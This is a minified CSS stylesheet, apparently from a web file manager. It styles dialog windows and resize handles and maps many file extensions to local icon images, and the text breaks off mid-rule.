button::-moz-focus-inner{border:0;padding:0;margin:0;}.aui-buttons button.aui-state-highlight{color:#FFF;background:#63acff;}.aui-buttons button.aui-state-highlight:hover{color:#FFF;background:#96c7ff;}.aui-buttons button.aui-state-highlight:active{background:#0076fc;}.aui-buttons button.disable,.aui-buttons button.disabled{opacity:0.3;filter:alpha(opacity=30);}.aui-outer{border:0px solid #63acff;-webkit-box-shadow:0px 5px 20px rgba(0,0,0,0.6);-moz-box-shadow:0px 5px 20px rgba(0,0,0,0.6);box-shadow:0px 5px 20px rgba(0,0,0,0.6);-webkit-transition:box-shadow 0.1s opacity 0.2s;-moz-transition:box-shadow 0.1s opacity 0.2s;-o-transition:box-shadow 0.1s opacity 0.2s;-ms-transition:box-shadow 0.1s opacity 0.2s;transition:box-shadow 0.1s opacity 0.2s;}.aui-state-lock .aui-nw,.aui-state-lock .aui-n,.aui-state-lock .aui-ne,.aui-state-lock .aui-w,.aui-state-lock .aui-e,.aui-state-lock .aui-sw,.aui-state-lock .aui-s,.aui-state-lock .aui-se{background:rgba(0,0,0,0.5);background:#000 \9 !important;opacity:0.5;filter:alpha(opacity=50);}.aui-title-bar{position:relative;height:100%;}.aui-title{height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;background-color:#7dbaff;}.aui-state-focus .aui-mask{display:none;}.aui-state-focus .aui-outer{-webkit-box-shadow:0px 5px 40px rgba(0,0,0,0.7);-moz-box-shadow:0px 5px 40px rgba(0,0,0,0.7);box-shadow:0px 5px 40px rgba(0,0,0,0.7);}.aui-state-focus .aui-title{background-color:#63acff;}.aui-state-drag .aui-title{cursor:move;cursor:-webkit-grabbing;cursor:grabbing;}.aui-min,.aui-max,.aui-close{display:block;position:absolute;text-decoration:none;outline:none;cursor:pointer;font-size:1.25em;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;color:#fff;border-top:none;top:0px;height:22px;width:35px;font-size:1.15em;line-height:22px;text-align:center;background-color:transparent;height:24px;width:38px;line-height:25px;color:#ffffff;font-family:FontAwesome;}.aui-min:hover,.aui-max:hover,.aui-close:hover{text-decoration:none;color:#fff;background-color:#1783ff;}.aui-close:hover{background:#cc0000;}.aui-min{right:82px;content:"\f068";}.aui-max{right:43px;content:"\f065";}.aui-close{right:5px;content:"\f00d";}.aui-min:before{content:"\f068";}.aui-max:before{content:"\f065";}.aui-close:before{content:"\f00d";}.aui-max,.aui-min{display:none;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-se{width:5px;height:5px;}.aui-state-no-title .aui-title-bar{bottom:0;_bottom:0;_margin-top:0;}.aui-state-no-title .aui-outer{box-shadow:none !important;border:none !important;}.aui-state-no-title .aui-inner{border:1px solid #aaa;}.aui-state-no-title .tips{padding:15px;padding-left:10px;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-n,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-w,.aui-state-no-title .aui-e,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-s,.aui-state-no-title .aui-se{background:rgba(0,0,0,0.1);background:#000 \9 !important;filter:alpha(opacity=10)!important;}.aui-state-no-title .aui-close,.aui-state-no-title .aui-max,.aui-state-no-title .aui-min{display:none;font-size:1em;}.dialog-max .aui-nw,.dialog-max .aui-ne,.dialog-max .aui-sw,.dialog-max .aui-se,.dialog-max .aui-w,.dialog-max .aui-e{width:0px;}.dialog-max .aui-sw,.dialog-max .aui-n,.dialog-max .aui-se{height:0px;}.dialog-max .aui-outer{border:none !important;}.dialog-can-resize .resize-handle{position:absolute;z-index:999999;display:block;}.dialog-can-resize .resize-top{cursor:n-resize;top:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-bottom{cursor:s-resize;bottom:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-right{cursor:e-resize;right:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-left{cursor:w-resize;left:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-bottom-right{cursor:se-resize;width:18px;height:18px;right:-7px;bottom:-7px;background:url('../../../images/common/dialog/resize_corner.png') no-repeat;opacity:0.4;filter:alpha(opacity=40);}.dialog-can-resize .resize-bottom-left{cursor:sw-resize;width:15px;height:15px;left:-7px;bottom:-7px;}.dialog-can-resize .resize-top-left{cursor:nw-resize;width:15px;height:15px;left:-7px;top:-7px;}.dialog-can-resize .resize-top-right{cursor:ne-resize;width:15px;height:15px;right:-5px;top:-7px;}.dialog-can-resize .aui-min,.dialog-can-resize .aui-max{display:block;}.dialog-min-size{width:250px !important;height:30px !important;}.dialog-min-size.dialog-no-title .aui-title,.dialog-min-size .aui-title{opacity:1 !important;}.dialog-min-size .aui-outer{width:250px;}.dialog-min-size .aui-header{height:30px;}.dialog-min-size .aui-title{text-align:left;padding-left:10px;}.dialog-min-size .aui-main,.dialog-min-size .aui-footer{display:none;}.dialog-min-size .resize-handle{display:none;}.dialog-no-title .aui-title-bar{position:absolute;z-index:99999;width:100%;height:30px;top:0;}.dialog-no-title .aui-title{opacity:0.01 !important;filter:alpha(opacity=1) !important;}.dialog-no-title .aui-inner{border:none;}.dialog-no-title .aui-nw,.dialog-no-title .aui-n,.dialog-no-title .aui-ne,.dialog-no-title .aui-w,.dialog-no-title .aui-e,.dialog-no-title .aui-sw,.dialog-no-title .aui-s,.dialog-no-title .aui-se{display:none;}.dialog-no-title .aui-outer .aui-min{right:80px;}.dialog-no-title .aui-outer .aui-min:before{content:"\f068" !important;}.dialog-no-title .aui-outer .aui-max{right:40px;}.dialog-no-title .aui-outer .aui-max:before{content:"\f065" !important;}.dialog-no-title .aui-outer .aui-close{right:0px;}.dialog-no-title .aui-outer .aui-close:before{content:"\f00d" !important;}.dialog-no-title .aui-outer .aui-min,.dialog-no-title .aui-outer .aui-max,.dialog-no-title .aui-outer .aui-close{display:block;position:absolute;text-decoration:none;outline:none;font-size:1.25em;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;color:#fff;top:0px;cursor:pointer;height:30px;line-height:30px;text-align:center;background-color:transparent;width:40px;font-family:FontAwesome;border:none;background-image:none;border-radius:0;}.dialog-no-title .aui-outer .aui-min:hover,.dialog-no-title .aui-outer .aui-max:hover,.dialog-no-title .aui-outer .aui-close:hover{color:#fff;border:none;box-shadow:none;background:#41acf8;background:rgba(0,0,0,0.4);}.dialog-no-title .aui-outer .aui-close:hover{background:#e81123;background:rgba(232,17,35,0.8);}.dialog-no-title.header-bg .aui-content .header{height:90px;background-color:#008def;background-image:linear-gradient(to bottom,#084998 0,#00a9fb 100%);color:#fff;position:relative;}.dialog-no-title.header-bg .aui-content .header .bg{background:url("../../../images/common/banner/box.png") 180px -220px no-repeat;width:100%;height:100%;position:absolute;opacity:0.7;}.dialog-no-title.dialog-max .aui-outer .aui-max{right:40px;}.dialog-no-title.dialog-max .aui-outer .aui-max:before{content:"\f066" !important;}body div.dialog-simple .aui-title-bar{width:100%;position:relative;bottom:0;height:100%;}body div.dialog-simple .aui-border{border:none;overflow:auto;}body div.dialog-simple .aui-outer{border:none;border-radius:none;box-shadow:none;background:none;}body div.dialog-simple .aui-inner{border:none;background:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-n,body div.dialog-simple .aui-ne,body div.dialog-simple .aui-w,body div.dialog-simple .aui-e,body div.dialog-simple .aui-sw,body div.dialog-simple .aui-s,body div.dialog-simple .aui-se{background:none;}body div.dialog-simple .aui-title{background:rgba(0,0,0,0.8);opacity:0.8;filter:alpha(opacity=80);border-radius:3px;border:none;height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;}body div.dialog-simple .aui-min,body div.dialog-simple .aui-max,body div.dialog-simple .aui-close{border:none;top:5px;position:absolute;text-decoration:none;outline:none;cursor:pointer;background-color:rgba(255,255,255,0.3);color:#fff;opacity:0.5;filter:alpha(opacity=50);height:22px;width:22px;font-size:1.15em;line-height:22px;text-align:center;border-radius:4px;font-family:FontAwesome;}body div.dialog-simple .aui-min:hover,body div.dialog-simple .aui-max:hover,body div.dialog-simple .aui-close:hover{text-decoration:none;color:#fff;background-color:#cc0000;}body div.dialog-simple .aui-min:active,body div.dialog-simple .aui-max:active,body div.dialog-simple .aui-close:active{color:fff;background-color:#f00;}body div.dialog-simple .aui-main{background:none !important;}body div.dialog-simple .aui-max{right:30px;}body div.dialog-simple .aui-min{right:56px;}body div.dialog-simple .aui-dialog,body div.dialog-simple .aui-border{background:none;}body div.dialog-simple .resize-bottom-right{background:none !important;}body div.dialog-simple .aui-header{opacity:0.01;filter:alpha(opacity=1);border:1px solid rgba(0,0,0,0.01);border-bottom:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-ne{height:0px;}body div.dialog-simple.aui-state-drag .aui-header,body div.dialog-simple .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-can-resize .aui-max,body div.dialog-simple.dialog-can-resize .aui-min{display:block;}body div.dialog-simple.dialog-can-resize .aui-main{border:1px solid rgba(0,0,0,0.01);border-top:none;}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-main,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-main{border-color:rgba(0,0,0,0.2);}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-header,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);border-color:rgba(0,0,0,0.2);}body div.dialog-simple.aui-state-drag .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-max .aui-header{opacity:1.0;filter:alpha(opacity=100);}.x-item-small{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.x-item-file{background-repeat:no-repeat;background-size:cover;background-position:center;background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');width:100%;height:100%;display:inline-block;pointer-events:none;}.x-item-file.small{width:20px;height:20px;}.file-list-icon .file .ico .x-item-file{border-radius:5px;margin-top:6px;margin-top:4px;}.bindary-box .ico .x-item-file{width:90px;height:90px;margin-top:28px;}.file-list-list .file .ico .x-item-file,.file-list-split .file .ico .x-item-file{border:none;}.ztree li span.tree_icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.header-content #yarnball .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.task-tab .tabs .tab .x-item-file,.task-tab .tabs .tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.aui-title .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.edit-tab .tabs .tab .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.draggable-dragging .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.do-search-box .search-result .file-item .file-info .file-icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.context-menu-list .context-menu-item .font-icon.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;margin-right:12px;}.context-menu-list .context-menu-item .font-icon.x-item-file:before{content:"";}.context-menu-list .context-menu-item img.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;background:none;margin-right:12px;height:auto;}.aui-title .x-item-file.x-font-icon{font-size:12px;line-height:18px;color:#fff;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.x-txt.small,.x-textile.small,.x-inc.small,.x-log.small{background-image:url("../../../images/file_icon/icon_file/txt_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-php.small{background-image:url("../../../images/file_icon/icon_file/php_small.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php_small.png?ver=3.30',sizingMethod='scale');background-size:auto;}.x-txt,.x-textile,.x-oexe,.x-inc,.x-csv,.x-log,.x-asc,.x-tsv,.x-lnk,.x-url,.x-webloc,.x-meta,.x-localized,.x-xib,.x-xsd,.x-storyboard,.x-plist,.x-csproj,.x-pch,.x-pbxproj,.x-local,.x-xcscheme,.x-manifest,.x-vbproj,.x-strings,.x-jshintrc,.x-sublime-project,.x-readme,.x-changes,.x-changelog,.x-version,.x-license,.x-changelog,.x-abap,.x-abc,.x-as,.x-asp,.x-aspx,.x-ada,.x-adb,.x-htaccess,.x-htgroups,.x-htgroups,.x-htpasswd,.x-asciidoc,.x-adoc,.x-asm,.x-a,.x-ahk,.x-bat,.x-cmd,.x-cpp,.x-c,.x-cc,.x-cxx,.x-h,.x-hh,.x-hpp,.x-ino,.x-c9search_results,.x-cirru,.x-cr,.x-clj,.x-cljs,.x-cbl,.x-cob,.x-coffee,.x-cf,.x-cson,.x-cakefile,.x-cfm,.x-cs,.x-css,.x-curly,.x-d,.x-di,.x-dart,.x-diff,.x-patch,.x-dockerfile,.x-dot,.x-dummy,.x-dummy,.x-e,.x-ge,.x-ejs,.x-ex,.x-exs,.x-elm,.x-erl,.x-hrl,.x-frt,.x-fs,.x-ldr,.x-ftl,.x-gcode,.x-feature,.x-.gitignore,.x-glsl,.x-frag,.x-vert,.x-gbs,.x-go,.x-groovy,.x-haml,.x-hbs,.x-handlebars,.x-tpl,.x-mustache,.x-hs,.x-hx,.x-html,.x-hta,.x-htm,.x-xhtml,.x-eex,.x-html.eex,.x-erb,.x-rhtml,.x-html.erb,.x-ini,.x-inf,.x-conf,.x-cfg,.x-prefs,.x-io,.x-jack,.x-jade,.x-java,.x-ji,.x-jl,.x-jq,.x-js,.x-jsm,.x-json,.x-jsp,.x-jsx,.x-latex,.x-ltx,.x-bib,.x-lean,.x-hlean,.x-less,.x-liquid,.x-lisp,.x-ls,.x-logic,.x-lql,.x-lsl,.x-lua,.x-lp,.x-lucene,.x-Makefile,.x-makemakefile,.x-gnumakefile,.x-makefile,.x-ocamlmakefile,.x-make,.x-md,.x-markdown,.x-mask,.x-matlab,.x-mz,.x-mel,.x-mc,.x-mush,.x-mysql,.x-nix,.x-nsi,.x-nsh,.x-m,.x-mm,.x-ml,.x-mli,.x-pas,.x-p,.x-pl,.x-pm,.x-pgsql,.x-php,.x-phtml,.x-shtml,.x-php3,.x-php4,.x-php5,.x-phps,.x-phpt,.x-aw,.x-ctp,.x-module,.x-ps1,.x-praat,.x-praatscript,.x-psc,.x-proc,.x-plg,.x-prolog,.x-properties,.x-proto,.x-py,.x-r,.x-cshtml,.x-rd,.x-rhtml,.x-rst,.x-rb,.x-ru,.x-gemspec,.x-rake,.x-guardfile,.x-rakefile,.x-gemfile,.x-rs,.x-sass,.x-scad,.x-scala,.x-scm,.x-sm,.x-rkt,.x-oak,.x-scheme,.x-scss,.x-sh,.x-bash,.x-bashrc,.x-sjs,.x-smarty,.x-tpl,.x-snippets,.x-soy,.x-space,.x-sql,.x-sqlserver,.x-styl,.x-stylus,.x-svg,.x-swift,.x-tcl,.x-tex,.x-toml,.x-twig,.x-swig,.x-ts,.x-typescript,.x-str,.x-vala,.x-vbs,.x-vb,.x-vm,.x-v,.x-vh,.x-sv,.x-svh,.x-vhd,.x-vhdl,.x-wlk,.x-wpgm,.x-wtest,.x-xml,.x-rdf,.x-rss,.x-wsdl,.x-xslt,.x-atom,.x-mathml,.x-mml,.x-xul,.x-xbl,.x-xaml,.x-xq,.x-yaml,.x-yml,.x-cer,.x-reg,.x-config,.x-srt,.x-ass,.x-lrc{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-pl,.x-pm,.x-cgi,.x-as,.x-asm,.x-clj,.x-cbl,.x-cfm,.x-d,.x-diff,.x-dot,.x-ejs,.x-erl,.x-ftl,.x-go,.x-hs,.x-vbs,.x-haml,.x-erb,.x-jade,.x-json,.x-jq,.x-jsx,.x-ji,.x-tex,.x-lisp,.x-ls,.x-lsl,.x-lua,.x-lp,.x-matlab,.x-mel,.x-r,.x-yaml,.x-yml{background-image:url("../../../images/file_icon/icon_file/code.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/code.png?ver=3.30',sizingMethod='scale');}.x-bin,.x-hex,.x-zip,.x-pdf,.x-swf,.x-gzip,.x-rar,.x-arj,.x-tar,.x-gz,.x-cab,.x-tbz,.x-tbz2,.x-lzh,.x-uue,.x-bz2,.x-ace,.x-exe,.x-so,.x-dll,.x-chm,.x-rtf,.x-odp,.x-odt,.x-pages,.x-class,.x-psd,.x-ttf,.x-fla,.x-dmg,.x-dat,.x-ipa,.x-lib,.x-a,.x-apk,.x-so,.x-o{background-image:url("../../../images/file_icon/icon_file/bin.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bin.png?ver=3.30',sizingMethod='scale');}.x-music,.x-mp3,.x-wma,.x-mp2,.x-mid,.x-aac,.x-ogg,.x-oga,.x-webma,.x-wav,.x-m4a,.x-m3u,.x-m4a,.x-midi,.x-mid,.x-flac,.x-alac,.x-ape,.x-ac3{background-image:url("../../../images/file_icon/icon_file/music.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/music.png?ver=3.30',sizingMethod='scale');}.x-avi,.x-rm,.x-rmvb,.x-mpg,.x-mkv,.x-wmv,.x-mov,.x-mp4,.x-evo,.x-divx,.x-3gp,.x-asf,.x-ogv,.x-webmv,.x-cue,.x-hd,.x-hdmov,.x-mov,.x-mp4v,.x-mpeg,.x-ogm,.x-qt,.x-spx,.x-vob,.x-wmv,.x-xvid,.x-webm,.x-m4v,.x-mts,.x-mpe,.x-m2ts,.x-mpv,.x-cue{background-image:url("../../../images/file_icon/icon_file/movie.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/movie.png?ver=3.30',sizingMethod='scale');}.x-flv,.x-f4v{background-image:url("../../../images/file_icon/icon_file/flv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/flv.png?ver=3.30',sizingMethod='scale');}.x-html,.x-htm,.x-url,.x-tpl,.x-lnk,.x-haml,.x-shtml,.x-webloc,.x-hta,.x-xhtml{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-css,.x-less,.x-sass{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-js,.x-coffee,.x-jsx{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-xml,.x-config,.x-manifest,.x-xaml,.x-csproj,.x-vbproj{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-cs,.x-asp,.x-aspx{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-java,.x-jsp{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-mm,.x-cc,.x-cxx,.x-cpp,.x-c,.x-m,.x-nc{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-h,.x-hpp,.x-hh,.x-pch{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-png,.x-jpg,.x-jpeg,.x-bmp,.x-gif,.x-picture,.x-ico,.x-svg,.x-cur,.x-webp,.x-tif,.x-tiff{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-make,.x-Makefile,.x-makefile,.x-GNUmakefile,.x-OCamlMakefile,.x-makemakefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-iso,.x-vcd{background-image:url("../../../images/file_icon/icon_file/iso.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/iso.png?ver=3.30',sizingMethod='scale');}.x-pkg,.x-package,.x-framework{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-7z,.x-apk,.x-ace,.x-arj,.x-bza,.x-cab,.x-cxr,.x-dgc,.x-gca,.x-gz,.x-gza,.x-iso,.x-jar,.x-lzh,.x-rar,.x-rk,.x-tar,.x-tbz,.x-tgz,.x-tlz,.x-txz,.x-yz1,.x-zip{background-image:url("../../../images/file_icon/icon_file/zip_all.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip_all.png?ver=3.30',sizingMethod='scale');}.x-exe,.x-bin,.x-class,.x-a,.x-so{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-ttf,.x-otf,.x-eot,.x-woff,.x-tiff,.x-ttc{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-bat,.x-cmd,.x-sh,.x-bash,.x-bashrc{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-ini,.x-inf,.x-conf,.x-meta,.x-gitignore,.x-plist,.x-htaccess,.x-localized,.x-xcscheme,.x-storyboard,.x-xib,.x-strings,.x-pbxproj{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-md,.x-markdown{background-image:url("../../../images/file_icon/icon_file/md.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/md.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-accdb{background-image:url("../../../images/file_icon/icon_file/accdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/accdb.png?ver=3.30',sizingMethod='scale');}.x-7z{background-image:url("../../../images/file_icon/icon_file/7z.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/7z.png?ver=3.30',sizingMethod='scale');}.x-ai{background-image:url("../../../images/file_icon/icon_file/ai.png");background-image:none 